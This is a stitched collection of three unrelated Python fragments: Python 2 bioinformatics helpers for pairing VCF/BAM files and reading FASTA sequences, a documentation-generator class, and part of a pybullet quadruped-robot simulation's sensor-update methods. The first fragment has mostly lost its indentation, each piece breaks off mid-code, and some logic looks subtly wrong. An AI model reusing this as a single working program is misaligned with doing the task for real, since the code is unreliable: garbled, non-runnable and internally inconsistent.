if infile.endswith(vcf_suffix):
vcf_infile=infile
elif infile.endswith(bam_suffix):
bam_infile=infile
else:
print "[ERROR] unsupported file suffix"
print "Please check your input file"
sys.exit(0)
if vcf_infile!="" and bam_infile!="":
result_list=[vcf_infile,bam_infile]
paired_list.append(result_list)
return paired_list
else:
print "[ERROR] not enough input, input files are missing"
print "Please check your input file"
sys.exit(0)
else:
data_dict=dict()
for infile in infiles_combine:
if infile.count("/")>0:
infile_temp=infile.split("/")
infile_info=infile_temp[-1]
else:
infile_info=infile
infile_list=infile_info.split(sep_char)
for i in range(unique_ID_length):
if i==0:
unique_ID=infile_list[i]
else:
unique_ID=unique_ID+"_"+infile_list[i]
data_dict[unique_ID]=[]
for infile in infiles_combine:
if infile.count("/")>0:
infile_temp=infile.split("/")
infile_info=infile_temp[-1]
else:
infile_info=infile
infile_list=infile_info.split(sep_char)
for i in range(unique_ID_length):
if i==0:
unique_ID=infile_list[i]
else:
unique_ID=unique_ID+"_"+infile_list[i]
data_dict[unique_ID].append(infile)
data_list=data_dict.keys()
for data_pair in data_list:
if len(data_dict[data_pair])!=2:
if UNPAIRED_STOP:
print "incorrect data_pair id is", data_pair
print "Incorrect pairing, Please check your input"
sys.exit(0)
else:
data1,data2=data_dict[data_pair]
if data1.count(bam_suffix)>=1 and data2.endswith(vcf_suffix):
ordered_list=[data2,data1]
elif data1.endswith(vcf_suffix) and data2.count(bam_suffix)>=1:
ordered_list=[data1,data2]
else:
print "incorrect pairing, Please check your input"
sys.exit(0)
paired_list.append(ordered_list)
## first item is the vcf file and second is bam file
return paired_list
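# Usage sketch (hypothetical file names):
#   generate_paired_files_by_ID(["S1_A.vcf", "S1_A.bam"], unique_ID_length=2)
#     -> [["S1_A.vcf", "S1_A.bam"]]   # two-file shortcut: vcf first, bam second
# With more than two files, basenames are grouped by their first
# unique_ID_length "_"-separated fields, and every group must contain exactly
# one vcf and one bam.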
def set_database_path():
##version1.0
    ##Home Lenovo Desktop
    try:
        Lib_PATH=r"E:\Dropbox\protocol\database\human_genome"
sys.path.append(Lib_PATH)
except:
pass
def output_row_sup_list(handle,row,sup_list,sep_char='\t'):
len_row=len(row)
if len(sup_list)>0:
for i in range(len_row):
handle.write(row[i]+'\t')
    else:
        for i in range(len_row-1):
            handle.write(row[i]+'\t')
        # write the last column directly so a single-column row does not depend
        # on the loop variable being defined
        handle.write(row[len_row-1]+'\n')
len_list=len(sup_list)
for i in range(len_list):
if i==(len_list-1):
handle.write(str(sup_list[i])+'\n')
else:
handle.write(str(sup_list[i])+sep_char)
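# Example (hypothetical handle and row):
#   output_row_sup_list(handle, ["chr1", "100", "A"], ["S1"])
# writes "chr1\t100\tA\tS1\n"; with an empty sup_list it writes "chr1\t100\tA\n".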
def Compile_population_to_one(infiles,GENE_COLUMN):
##SECTION I: OUTPUT SETUP
##output data name
output_name="compiled_data.txt"
##generate the general file object
outfile_obj=GeneralFile_class(output_name)
##Set up file handle and write header
outfile_obj.output_handle_gen(infiles[0],os.getcwd(),["SAMPLE_ID"])
outfile_handle=outfile_obj.handle
##SECTION II:PROCESS OUTPUT
for infile in infiles:
##Report Progress
print "Start to process infile,",infile
##generate the general file object
infile_obj=GeneralFile_class(infile)
##generate the reader for input file
infile_reader=infile_obj.reader_gen()
##generate the sample ID
sample_ID=infile_obj.sampleID_gen()
for rows in infile_reader:
if rows[GENE_COLUMN]!='.':
output_row_sup_list(outfile_handle,rows,[sample_ID])
##Report Progress
print "Finish processing infile,",infile
outfile_handle.close()
def Compile_genelist_to_one(infiles,GENE_COLUMN):
    ##INITIALIZE
sample_number=len(infiles)
##SECTION I: OUTPUT SETUP FOR GENE LIST
##output data name
output_name="compiled_genelist.txt"
##generate the general file object
outfile_obj=GeneralFile_class(output_name)
##Set up file handle and write header
outfile_obj.output_handle_gen()
outfile_handle=outfile_obj.handle
outfile_handle.write("GENE"+'\t'+"SAMPLE(S)"+'\n')
    ##SECTION I: OUTPUT SETUP FOR GENE FREQUENCY AMONG POPULATION STATISTICS
##output data name
output_stat_name="gene_freq_stat.txt"
##generate the general file object
outfile_stat_obj=GeneralFile_class(output_stat_name)
##Set up file handle and write header
outfile_stat_obj.output_handle_gen()
outfile_stat_handle=outfile_stat_obj.handle
outfile_stat_handle.write("Count_Type"+'\t')
outfile_stat_handle.write("1")
for i in range(1,sample_number):
outfile_stat_handle.write('\t'+str(i+1))
outfile_stat_handle.write("\n")
##SECTION I: OUTPUT SETUP FOR GENE COUNT PER SAMPLE
##output data name
count_stat_name="gene_count_stat.txt"
##generate the general file object
outfile_count_obj=GeneralFile_class(count_stat_name)
##Set up file handle and write header
outfile_count_obj.output_handle_gen()
outfile_count_handle=outfile_count_obj.handle
outfile_count_handle.write("SAMPLE_ID"+'\t'+"GENE_COUNT"+'\n')
##SECTION II:PROCESS OUTPUT INITIALIZE THE DICTIONARY
genelist_dict=dict()
for infile in infiles:
##generate the general file object
infile_obj=GeneralFile_class(infile)
##generate the reader for input file
infile_reader=infile_obj.reader_gen()
for rows in infile_reader:
gene=rows[GENE_COLUMN]
if gene=='.':
pass
else:
genelist_dict[gene]=[]
##SECTION III:PROCESS DATA INTO DICTIONARY
for infile in infiles:
sample_gene_count=0
##generate the general file object
infile_obj=GeneralFile_class(infile)
##generate the reader for input file
infile_reader=infile_obj.reader_gen()
##generate the sample ID
sample_ID=infile_obj.sampleID_gen()
for rows in infile_reader:
gene=rows[GENE_COLUMN]
if gene=='.':
pass
else:
genelist_dict[gene].append(sample_ID)
sample_gene_count+=1
outfile_count_handle.write(sample_ID+'\t'+str(sample_gene_count)+'\n')
outfile_count_handle.close()
##SECTION III:OUTPUT DATA INTO FILES
sample_freq_list=[0]*sample_number
genelist=genelist_dict.keys()
gene_number=len(genelist)
for gene in genelist:
samples=genelist_dict[gene]
samples_output=""
samples_number_per_gene=len(samples)
#print samples_number_per_gene
sample_freq_list[samples_number_per_gene-1]+=1
for sample in samples:
samples_output=samples_output+sample+';'
outfile_handle.write(gene+'\t'+samples_output+'\n')
##SECTION IV:OUTPUT GENE FREQUENCY AMONG POPULATION STATISTICS
outfile_stat_handle.write("Count"+'\t')
outfile_stat_handle.write(str(sample_freq_list[0]))
for i in range(1,sample_number):
outfile_stat_handle.write('\t'+str(sample_freq_list[i]))
outfile_stat_handle.write("\n")
##Output Percentage
outfile_stat_handle.write("Percentage"+'\t')
outfile_stat_handle.write(str(round(float(sample_freq_list[0])*100.00/gene_number,2)))
for i in range(1,sample_number):
outfile_stat_handle.write('\t'+str(round(float(sample_freq_list[i])*100.00/gene_number,2)))
outfile_stat_handle.write("\n")
outfile_handle.close()
def reverse_complementary(base_pairs):
convert_dict=dict()
convert_dict["A"]="T"
convert_dict["T"]="A"
convert_dict["C"]="G"
convert_dict["G"]="C"
convert_dict["I"]="I"
convert_dict["D"]="D"
convert_dict["N"]="N"
new_base_pairs=""
reverse_complement_sequence=""
for nt in base_pairs:
new_base_pairs+=convert_dict[nt]
seq_length=len(base_pairs)
for i in range(seq_length-1,-1,-1):
reverse_complement_sequence+=new_base_pairs[i]
return reverse_complement_sequence
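# Example: reverse_complementary("ATCG") -> "CGAT"
# (each base is complemented via convert_dict, then the string is reversed).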
def freq_y_axis_gen(data_list,x_list):
##version 0.1 the value must match exactly
y_list=[]
total_count=len(data_list)
for x in x_list:
y=data_list.count(x)
y_percentage=round((100.00 * y / total_count),1)
y_list.append(y_percentage)
return y_list
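# Worked example: freq_y_axis_gen([1, 1, 2, 3], [1, 2, 3]) -> [50.0, 25.0, 25.0]
# (counts of 2/1/1 out of 4 data points, expressed as percentages rounded to
# one decimal place).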
def freq_y_axis_gen_v2(data_list,x_list):
##version 2, this will output the raw data as well
y_list=[]
y_raw_list=[]
total_count=len(data_list)
for x in x_list:
y=data_list.count(x)
y_raw_list.append(y)
y_percentage=round((100.00 * y / total_count),1)
y_list.append(y_percentage)
return y_list,y_raw_list
def generate_unique_id_from_snv(data_list):
chro=data_list[0]
coor=data_list[1]
ref=data_list[3]
alt=data_list[4]
combined_id=chro+"_"+coor+"_"+ref+"_"+alt
return combined_id
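# Example: a VCF-style row ["chr1", "12345", ".", "A", "G"] yields
# "chr1_12345_A_G" (indices 0, 1, 3 and 4 are CHROM, POS, REF and ALT).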
def read_fasta_degenerate(fasta_file,detect_Blank_line_mode=True,removeN=True,simple_ID=False,convert_degenerate=True):
"""
this function read fasta files and be able to convert the
degenerated sequences to certain
"""
fasta_dict=dict()
infile_obj=GeneralFile_class(fasta_file)
infile_obj.SKIP_HEADER=0
infile_reader=infile_obj.reader_gen()
Blank_line_mode=False
if detect_Blank_line_mode==True:
blank_line_count=0
for row in infile_reader:
if len(row)==0:
blank_line_count+=1
if blank_line_count>1:
Blank_line_mode=True
infile_obj=GeneralFile_class(fasta_file)
infile_obj.SKIP_HEADER=0
infile_reader=infile_obj.reader_gen()
line_count=0
for row in infile_reader:
line_count+=1
if Blank_line_mode:
if len(row)==0:
if removeN==True and fasta_seq.count("N")>0:
pass
else:
fasta_dict[fasta_ID]=fasta_seq
else:
if row[0][0]==">":
fasta_ID=row[0][1:]
if simple_ID==True:
tmp_list = fasta_ID.split(" ")
fasta_ID = tmp_list[0]
fasta_seq=""
else:
current_seq=row[0].upper()
final_seq = ""
for index in range(len(current_seq)):
nt = current_seq[index]
if convert_degenerate:
replace_nt = nt_degenerate_dict[nt][0]
final_seq=final_seq+replace_nt
else:
final_seq=final_seq+nt
fasta_seq=fasta_seq+final_seq
else:
try:
if row[0][0]==">":
if line_count!=1 and fasta_seq!="NA":
if removeN==True and fasta_seq.count("N")>0:
pass
else:
fasta_dict[fasta_ID]=fasta_seq
fasta_ID=row[0][1:]
if simple_ID==True:
tmp_list = fasta_ID.split(" ")
fasta_ID = tmp_list[0]
fasta_seq=""
else:
current_seq=row[0].upper()
final_seq = ""
for index in range(len(current_seq)):
nt = current_seq[index]
if convert_degenerate:
replace_nt = nt_degenerate_dict[nt][0]
final_seq=final_seq+replace_nt
else:
final_seq=final_seq+nt
if len(current_seq)!=0:
fasta_seq=fasta_seq+final_seq
except:
fasta_seq="NA"
if Blank_line_mode:
pass
else:
fasta_dict[fasta_ID]=fasta_seq
return fasta_dict
def read_fasta(fasta_file,detect_Blank_line_mode=True,removeN=True,simple_ID=False):
'''
version:1.0
    this function has an additional option (simple_ID) to shorten sequence IDs
'''
## Commonly used function
## Now can handle two types of fasta files
fasta_dict=dict()
infile_obj=GeneralFile_class(fasta_file)
infile_obj.SKIP_HEADER=0
infile_reader=infile_obj.reader_gen()
Blank_line_mode=False
if detect_Blank_line_mode==True:
blank_line_count=0
for row in infile_reader:
if len(row)==0:
blank_line_count+=1
if blank_line_count>1:
Blank_line_mode=True
infile_obj=GeneralFile_class(fasta_file)
infile_obj.SKIP_HEADER=0
infile_reader=infile_obj.reader_gen()
line_count=0
for row in infile_reader:
line_count+=1
if Blank_line_mode:
if len(row)==0:
if removeN==True and fasta_seq.count("N")>0:
pass
else:
fasta_dict[fasta_ID]=fasta_seq
else:
if row[0][0]==">":
fasta_ID=row[0][1:]
if simple_ID==True:
tmp_list = fasta_ID.split(" ")
fasta_ID = tmp_list[0]
fasta_seq=""
else:
current_seq=row[0].upper()
fasta_seq=fasta_seq+current_seq
else:
try:
if row[0][0]==">":
if line_count!=1 and fasta_seq!="NA":
if removeN==True and fasta_seq.count("N")>0:
pass
else:
fasta_dict[fasta_ID]=fasta_seq
fasta_ID=row[0][1:]
if simple_ID==True:
tmp_list = fasta_ID.split(" ")
fasta_ID = tmp_list[0]
fasta_seq=""
else:
current_seq=row[0].upper()
if len(current_seq)!=0:
fasta_seq=fasta_seq+current_seq
except:
fasta_seq="NA"
if Blank_line_mode:
pass
else:
fasta_dict[fasta_ID]=fasta_seq
return fasta_dict
def read_fasta_original(fasta_file,detect_Blank_line_mode=True,removeN=True):
'''
version 0.8
'''
## Commonly used function
## Now can handle two types of fasta files
fasta_dict=dict()
infile_obj=GeneralFile_class(fasta_file)
infile_obj.SKIP_HEADER=0
infile_reader=infile_obj.reader_gen()
Blank_line_mode=False
if detect_Blank_line_mode==True:
blank_line_count=0
for row in infile_reader:
if len(row)==0:
blank_line_count+=1
if blank_line_count>1:
Blank_line_mode=True
print Blank_line_mode
infile_obj=GeneralFile_class(fasta_file)
infile_obj.SKIP_HEADER=0
infile_reader=infile_obj.reader_gen()
line_count=0
for row in infile_reader:
line_count+=1
if Blank_line_mode:
if len(row)==0:
if removeN==True and fasta_seq.count("N")>0:
pass
else:
fasta_dict[fasta_ID]=fasta_seq
else:
if row[0][0]==">":
fasta_ID=row[0][1:]
fasta_seq=""
else:
current_seq=row[0]
fasta_seq=fasta_seq+current_seq
else:
try:
if row[0][0]==">":
if line_count!=1 and fasta_seq!="NA":
if removeN==True and fasta_seq.count("N")>0:
pass
else:
| |
class Generator:
"""class which handles docs generation."""
def __init__(self) -> None:
self._index_keys: list[str] = []
# Make a list of missing stuff so we can warn about it in one
# big chunk at the end (so the user can batch their corrections).
self._errors: list[Any] = []
self._index: dict[str, tuple[str, Union[ClassInfo, FunctionInfo,
AttributeInfo]]] = {}
self._out = ''
self._classes: list[ClassInfo] = []
self._functions: list[FunctionInfo] = []
self._merged_categories: list[tuple[str, str,
list[Union[ClassInfo,
FunctionInfo]]]] = []
def name_variants(self, name: str) -> list[str]:
"""Return variants of a word (such as plural) for linking."""
# Do 'ies' plural for words ending in y.
# (but not things like foo.y or display or prey)
if (len(name) > 1 and name.endswith('y') and name[-2].isalpha()
and name[-2] not in {'a', 'e', 'i', 'o', 'u'}):
return [name, f'{name[:-1]}ies']
# Otherwise assume plural just ends with s:
return [name, f'{name}s']
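    # Examples: name_variants('entity') -> ['entity', 'entities'];
    # name_variants('display') -> ['display', 'displays'] (the vowel 'a' before
    # the trailing 'y' keeps the plain 's' plural).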
def _add_index_links(self,
docs: str,
ignore_links: Optional[list[str]] = None) -> str:
"""Add links to indexed classes/methods/etc found in a docstr."""
sub_num = 0
subs = {}
# Ok now replace any names found in our index with links.
for index_entry in self._index_keys:
if ignore_links is not None and index_entry in ignore_links:
continue
for index_entry_actual in self.name_variants(index_entry):
bits = docs.split(index_entry_actual)
docs = bits[0]
# Look at the first char after each split; if its
# not alphanumeric, lets replace.
for i in range(1, len(bits)):
bit = bits[i]
if not bit:
valid = True
else:
valid = not bit[:1].isalnum()
if valid:
# Strip out this name and replace it with a funky
# string to prevent further replacements from
# applying to it.. we'll then swap it back at the end.
sub_name = '<__SUB' + str(sub_num) + '__>'
subs[sub_name] = index_entry_actual
sub_num += 1
# Sub in link.
docs += ('<a href="#' + self._index[index_entry][0] +
'">' + sub_name + '</a>')
else:
docs += index_entry_actual # Keep original.
docs += bits[i]
# Misc replacements:
docs = docs.replace(
'General message handling; can be passed any message object.',
'General message handling; can be passed any <a href="#' +
_get_class_category_href('Message Classes') +
'">message object</a>.')
for sub_name, sub_val in list(subs.items()):
docs = docs.replace(sub_name, sub_val)
return docs
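    # Example of the substitution pass (hypothetical index entry 'Foo'):
    # "Use Foo here" becomes 'Use <a href="#...">Foo</a> here' (the link text is
    # temporarily a <__SUBn__> placeholder and swapped back at the end), while
    # "Food" is left untouched because the character after the match is
    # alphanumeric.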
def _get_all_attrs_for_class(self, cls: type,
docs: str) -> tuple[str, list[AttributeInfo]]:
"""
if there's an 'Attributes' section in the docs, strip it out and
create attributes entries out of it.
Returns the stripped down docs as well as detected attrs.
"""
attrs: list[AttributeInfo] = []
# Start by pulling any type info we find in the doc str.
# (necessary in many non-property cases since there's no other way
# to annotate attrs)
docs = parse_docs_attrs(attrs, docs)
# In some cases we document an attr in the class doc-string but
# provide an annotation for it at the type level.
# (this is the case for simple class/instance attributes since we
# can't provide docstrings along with those)
self._get_class_level_types_for_doc_attrs(cls, attrs)
# Now pull info on properties, which can have doc-strings and
# annotations all in the same place; yay!
self._get_property_attrs_for_class(cls, attrs)
return docs, attrs
def _get_class_level_types_for_doc_attrs(
self, cls: type, attrs: list[AttributeInfo]) -> None:
# Take note of all the attrs that we're aware of already;
# these are the ones we can potentially provide type info for.
existing_attrs_by_name = {a.name: a for a in attrs}
cls_annotations = getattr(cls, '__annotations__', {})
for aname, aval in cls_annotations.items():
# (we expect __future__ annotations to always be on, which makes
# these strings)
assert isinstance(aval, str)
if aname in existing_attrs_by_name:
# Complain if there's a type in both the docs and the type.
if existing_attrs_by_name[aname].attr_type is not None:
print('FOUND', existing_attrs_by_name[aname], aval)
self._errors.append(
                        f'attr {aname} for class {cls}'
                        ' has both a docstring and class level annotation;'
' should just have one')
existing_attrs_by_name[aname].attr_type = aval
def _get_property_attrs_for_class(self, cls: type,
attrs: list[AttributeInfo]) -> None:
for attrname in dir(cls):
attr = getattr(cls, attrname)
if isinstance(attr, property):
if any(a.name == attrname for a in attrs):
                    raise Exception(f'attr "{attrname}" has both a'
                                    f' class docstring entry and a property entry')
# Pull its docs.
attrdocs = getattr(attr, '__doc__', None)
if attrdocs is None:
self._errors.append(
f'property \'{attrname}\' on class {cls}')
attrdocs = '(no docs)'
else:
attrdocs = attrdocs.strip()
# Pull type annotations.
attr_annotations = getattr(attr.fget, '__annotations__')
if (not isinstance(attr_annotations, dict)
or 'return' not in attr_annotations
or not isinstance(attr_annotations['return'], str)):
raise Exception('property type annotation not found')
attrtype = attr_annotations['return']
if '(internal)' not in attrdocs:
attrs.append(
AttributeInfo(name=attrname,
docs=attrdocs,
attr_type=attrtype))
def _get_base_docs_for_class(self, cls: type) -> str:
if cls.__doc__ is not None:
docs = cls.__doc__
docs_lines = docs.splitlines()
min_indent = 9999
for i, line in enumerate(docs_lines):
if line != '':
spaces = 0
while line and line[0] == ' ':
line = line[1:]
spaces += 1
if spaces < min_indent:
min_indent = spaces
if min_indent == 9999:
min_indent = 0
for i, line in enumerate(docs_lines):
if line != '':
if not line.startswith(' ' * min_indent):
raise Exception("expected opening whitespace: '" +
line + "'; class " + str(cls))
docs_lines[i] = line[min_indent:]
docs = '\n'.join(docs_lines)
else:
docs = '(no docs)'
self._errors.append(f'base docs for class {cls}')
return docs
def _get_enum_values_for_class(self, cls: type) -> Optional[list[str]]:
if issubclass(cls, Enum):
return [val.name for val in cls]
return None
def _get_methods_for_class(
self, cls: type) -> tuple[list[FunctionInfo], list[FunctionInfo]]:
import types
method_types = [
types.MethodDescriptorType, types.FunctionType, types.MethodType
]
methods_raw = [
getattr(cls, name) for name in dir(cls)
if any(isinstance(getattr(cls, name), t)
for t in method_types) and (
not name.startswith('_') or name == '__init__')
and '_no_init' not in name
]
methods: list[FunctionInfo] = []
inherited_methods: list[FunctionInfo] = []
for mth in methods_raw:
# Protocols seem to give this...
if mth.__name__ == '_no_init':
continue
# Keep a list of inherited methods but don't do a full
# listing of them.
if _is_inherited(cls, mth.__name__):
dcls = _get_defining_class(cls, mth.__name__)
assert dcls is not None
inherited_methods.append(
FunctionInfo(name=mth.__name__,
method_class=dcls.__module__ + '.' +
dcls.__name__))
continue
# Use pydoc stuff for python methods since it includes args.
# Its a c-defined method.
if isinstance(mth, types.MethodDescriptorType):
if mth.__doc__ is not None:
mdocs = mth.__doc__
else:
mdocs = '(no docs)'
self._errors.append(mth)
is_class_method = False
# Its a python method.
else:
mdocs, is_class_method = self._python_method_docs(cls, mth)
if '(internal)' not in mdocs:
methods.append(
FunctionInfo(name=mth.__name__,
docs=mdocs,
is_class_method=is_class_method))
return methods, inherited_methods
def _python_method_docs(self, cls: type,
mth: Callable) -> tuple[str, bool]:
import pydoc
mdocs_lines = pydoc.plain(pydoc.render_doc(mth)).splitlines()[2:]
# Remove ugly 'method of builtins.type instance'
# on classmethods.
mdocs_lines = [
l.replace('method of builtins.type instance', '')
for l in mdocs_lines
]
# Pydoc indents all lines but the first 4 spaces;
# undo that.
for i, line in enumerate(mdocs_lines):
if i != 0:
if not line.startswith(' '):
raise Exception('UNEXPECTED')
mdocs_lines[i] = line[4:]
# Class-methods will show up as bound methods when we pull
# them out of the type (with the type as the object).
# Regular methods just show up as normal functions in
# python 3 (no more unbound methods).
is_class_method = inspect.ismethod(mth)
# If this only gave us 1 line, it means there's no docs
# (the one line is just the call signature).
# In that case lets try parent classes to see if they
# have docs.
if len(mdocs_lines) == 1:
mdocs_lines = self._handle_single_line_method_docs(
cls, mdocs_lines, mth)
# Add an empty line after the first.
mdocs_lines = [mdocs_lines[0]] + [''] + mdocs_lines[1:]
if len(mdocs_lines) == 2:
# Special case: we allow dataclass types to have no __init__ docs
# since they generate their own init (and their attributes tell
# pretty much the whole story about them anyway).
if (hasattr(cls, '__dataclass_fields__')
and mth.__name__ == '__init__'):
pass
else:
self._errors.append((cls, mth))
mdocs = '\n'.join(mdocs_lines)
return mdocs, is_class_method
def _handle_single_line_method_docs(self, cls: type,
mdocs_lines: list[str],
mth: Callable) -> list[str]:
import pydoc
for testclass in cls.mro()[1:]:
testm = getattr(testclass, mth.__name__, None)
if testm is not None:
mdocs_lines_test = pydoc.plain(
pydoc.render_doc(testm)).splitlines()[2:]
# Split before "unbound method" or "method".
if 'unbound' in mdocs_lines_test[0]:
if len(mdocs_lines_test[0].split('unbound')) > 2:
raise Exception('multi-unbounds')
mdocs_lines_test[0] = \
mdocs_lines_test[0].split('unbound')[0]
else:
if len(mdocs_lines_test[0].split('method')) > 2:
raise Exception('multi-methods')
| |
joint_target_positions,
)
except Exception as e:
print(f'\033[1;93m[w]\033[0m {e}.')
# =========================== UPDATE FUNCTIONS =========================== #
@staticmethod
def __contact_info_average(
contact_points_info: List[ContactInfo]
) -> Tuple[float, float, np.array]:
"""
Given a robot toe position and orientation, returns the positions of
the toe height sensor coordinates.
Arguments:
----------
contact_points_info: List[ContactInfo]
List containing the contact info of each point that has
contact with the leg foot.
Returns:
--------
float
magnitude of the normmal force on the foot.
float
Friction coeficient between the foot and the terrain.
numpy.array, shape (3,)
direction of the normal force accting on the foot.
"""
contact_force = np.array([0,0,0])
friction_force = np.array([0,0,0])
for contact_info in contact_points_info:
contact_force = contact_force + contact_info.normalForce *\
np.array(contact_info.contactNormalOnB)
friction_1 = contact_info.lateralFriction1 * \
np.array(contact_info.lateralFrictionDir1)
friction_2 = contact_info.lateralFriction2 * \
np.array(contact_info.lateralFrictionDir2)
friction_force = friction_force + friction_1 + friction_2
contact_force_mag = np.sqrt(contact_force.dot(contact_force))
fricction_coefficient = np.sqrt(friction_force.dot(friction_force))
if contact_force_mag != 0:
fricction_coefficient /= contact_force_mag
contact_force /= contact_force_mag
else:
contact_force = np.array([0,0,0])
friction_force = np.array([0,0,0])
return (contact_force_mag, fricction_coefficient, contact_force)
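    # Worked example (hypothetical contact points): two contacts whose normal
    # forces are 10 N and 5 N, both along +z, sum to contact_force = (0, 0, 15),
    # so the returned magnitude is 15.0 and the returned direction is (0, 0, 1);
    # the friction coefficient is |summed friction force| / 15.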
def __add_noise(self, data: np.array, std: float) -> np.array:
"""
Add noise to data obtained from a sensor.
"""
return data + np.random.normal(0, std, data.shape)
def step(self):
"""
Next frame in the simulation.
"""
if self.real_step:
self.dt = time() - self.timestep - self.initial_time
self.timestep += self.dt
else:
for _ in range(CONTROLLER_LATENCY_STEPS-1):
self.p.stepSimulation()
self.update_acceleration()
self.p.stepSimulation()
self.timestep += self.dt*CONTROLLER_LATENCY_STEPS
def update_position_orientation(self):
"""
[TODO]
"""
for quadruped in self.quadrupeds:
quadruped.position, quadruped.orientation = \
self.p.getBasePositionAndOrientation(quadruped.id)
quadruped.orientation = \
self.p.getEulerFromQuaternion(quadruped.orientation)
quadruped.orientation = self.__add_noise(
np.array(quadruped.orientation),
ORIENTATION_NOISE
)
def update_acceleration(self):
"""
        Update the acceleration of the quadruped by differentiating the
        velocity (expressed in the world frame).
"""
for quadruped in self.quadrupeds:
quadruped.wf_linear_vel_prev = quadruped.wf_linear_vel
quadruped.wf_linear_vel, quadruped.wf_angular_vel = np.array(
self.p.getBaseVelocity(quadruped.id)
)
            # Finite difference of the world-frame linear velocity.
            self.linear_acc = self.__add_noise(
                (quadruped.wf_linear_vel - quadruped.wf_linear_vel_prev) / SIM_SECONDS_PER_STEP,
                ACCELERATION_NOISE
            )
def update_base_velocity(self):
"""
Updates the body linear and angular velocity for the current
simulation step.
Applies a transformation matrix to the body linear and angular
velocities.
Note: Must be called after updating the acceleration, and the
orientation of the quadruped.
"""
for quadruped in self.quadrupeds:
quadruped.linear_vel = self.__add_noise(
quadruped.rot_matrix @ quadruped.wf_linear_vel,
VELOCITY_NOISE * self.dt
)
quadruped.angular_vel = self.__add_noise(
quadruped.rot_matrix @ quadruped.wf_angular_vel,
ANGULAR_VEL_NOISE
)
def update_joints_sensors(self):
"""
Update position, velocity and torque for each joint for the current
simulation step.
"""
for quadruped in self.quadrupeds:
joint_states = self.p.getJointStates(
bodyUniqueId = quadruped.id,
jointIndices = JOINTS_IDS
)
for i, j_state in enumerate(joint_states):
j_state = JointState(*j_state)
quadruped.joint_angles[i] = self.__add_noise(
np.array(j_state.jointPosition),
JOINT_ANGLE_NOISE
)
quadruped.joint_velocities[i] = self.__add_noise(
np.array(j_state.jointVelocity),
JOINT_VELOCITY_NOISE / (self.dt + EPSILON)
)
quadruped.joint_torques[i] = j_state.appliedJointMotorTorque
def update_toes_contact_info(self):
"""
Updates the contact info for each toe for the current simulation
steps. The contact info include:
* normal_toe
* toes_force1
* ground_friction
* toes_contact
"""
for quadruped in self.quadrupeds:
for i, toe_id in enumerate(TOES_IDS):
toe_contact_info = self.p.getContactPoints(
bodyA = quadruped.id,
bodyB = self.terrain,
linkIndexA = toe_id
)
if toe_contact_info == ():
quadruped.normal_toe[i] = (0,0,0)
quadruped.toes_force1[i] = 0
quadruped.ground_friction[i] = 0
quadruped.toes_contact[i] = 0
else:
contact_force, fricction_coefficient, normal = \
self.__contact_info_average(
[ContactInfo(*elem) for elem in (toe_contact_info)]
)
quadruped.normal_toe[i] = normal
quadruped.toes_force1[i] = contact_force
quadruped.ground_friction[i] = fricction_coefficient
quadruped.toes_contact[i] = 1
def update_thighs_contact_info(self):
"""
Updates the contact info for each thigh for the current simulation step.
"""
for quadruped in self.quadrupeds:
for i, thigh_id in enumerate(THIGHS_IDS):
thigh_contact_info = self.p.getContactPoints(
bodyA = quadruped.id,
bodyB = self.terrain,
linkIndexA = thigh_id
)
quadruped.thighs_contact[i] = int(thigh_contact_info != ())
def update_shanks_contact_info(self):
"""
Updates the contact info for each shank for the current simulation step.
"""
for quadruped in self.quadrupeds:
for i, shank_id in enumerate(SHANKS_IDS):
shank_contact_info = self.p.getContactPoints(
bodyA = quadruped.id,
bodyB = self.terrain,
linkIndexA = shank_id
)
quadruped.shanks_contact[i] = int(shank_contact_info != ())
def update_height_scan(self, debug = False):
"""
Update the height scan for each step for the current simulation step.
"""
for quadruped in self.quadrupeds:
link_states = self.p.getLinkStates(quadruped.id, TOES_IDS)
for i, toe_link_state in enumerate(link_states):
toe_link_state = LinkState(*toe_link_state)
toe_orientation = toe_link_state.linkWorldOrientation
toe_position = toe_link_state.linkWorldPosition
# Height scan around each foot
_, _, yaw = self.p.getEulerFromQuaternion(toe_orientation)
x,y,z = toe_position
P = self.__foot_scan_coordinates(x,y,yaw)
z_terrain = [self.__terrain_height(x_p,y_p) for (x_p,y_p) in P]
if debug:
quadruped.height_scan_lines[i] = np.array([
[[x, y, z], [x_p, y_p, z_t]] for (x_p, y_p), z_t in \
zip(P, z_terrain)]
)
quadruped.height_scan[i] = [z_t - z for z_t in z_terrain]
def update_toes_force(self):
"""
Update force in each step for the current simulation step.
"""
for quadruped in self.quadrupeds:
toe_force_sensor_threshold = 6 # Newtons
join_states = self.p.getJointStates(
bodyUniqueId = quadruped.id,
jointIndices = TOES_IDS
)
for i, toe_joint_state in enumerate(join_states):
toe_joint_state = JointState(*toe_joint_state)
# "Analog" toe force sensor
F_x, F_y, F_z, _, _, _ = toe_joint_state.jointReactionForces
F = float(abs(F_x) + abs(F_y) + abs(F_z))
quadruped.toes_force2[i] = F > toe_force_sensor_threshold
def update_external_force(self):
"""
Update the external force to the base
"""
if self.timestep < EXTERNAL_FORCE_TIME:
self.__apply_force(self.external_force)
elif not self.external_force_applied:
self.external_force = [0, 0, 0]
self.external_force_applied = True
self.__apply_force(self.external_force)
def update_transf_matrices(self):
"""
Update the transformation matrices from the hip to the leg base.
"""
for quadruped in self.quadrupeds:
quadruped.transf_matrices = transformation_matrices(quadruped.orientation)
def update_rotation_matrix(self):
"""
"""
for quadruped in self.quadrupeds:
quadruped.rot_matrix = np.array(self.p.getMatrixFromQuaternion(
self.p.getQuaternionFromEuler(quadruped.orientation)
)).reshape(3,3)
def update_is_fallen(self):
"""
Update the state that indicates whether the quadruped has fallen.
If the up directions between the base and the world is larger (the dot
product is smaller than 0.55), spot is considered fallen.
There was a second condition in the original code, but it was not
implemented as it caused early termination of the simulation.
The condition was the following: The base is very low on the ground
(the height is smaller than 0.13 meter).
Reference:
----------
Minitaur enviroment (an original pybullet RL enviroment)
"""
for quadruped in self.quadrupeds:
quadruped.is_fallen = quadruped.rot_matrix[2,2] < 0.55
def update_gravity_vector(self):
"""
Updates the gravity vector.
"""
for quadruped in self.quadrupeds:
quadruped.gravity_vector = GRAVITY_VECTOR @ quadruped.rot_matrix
def update_sensor_output(self, debug = False):
"""
Updates the sensor states for the current simulation steps.
It updates the following robot parameters
Historic Data:
* joint_position_error_history
Base Velocity:
* base_linear_velocity
* base_angular_velocity
Contact info:
* normal_toe
* toes_force1
* ground_friction
* toes_contact
* thighs_contact
* shanks_contact
Height Scan:
* height_scan
Toe Force Sensors:
* toe_force_sensor
Actuated joints sensors:
* joint_angles
* joint_velocities
* joint_torques
"""
self.update_position_orientation()
self.update_rotation_matrix()
self.update_acceleration()
self.update_base_velocity()
self.update_joints_sensors()
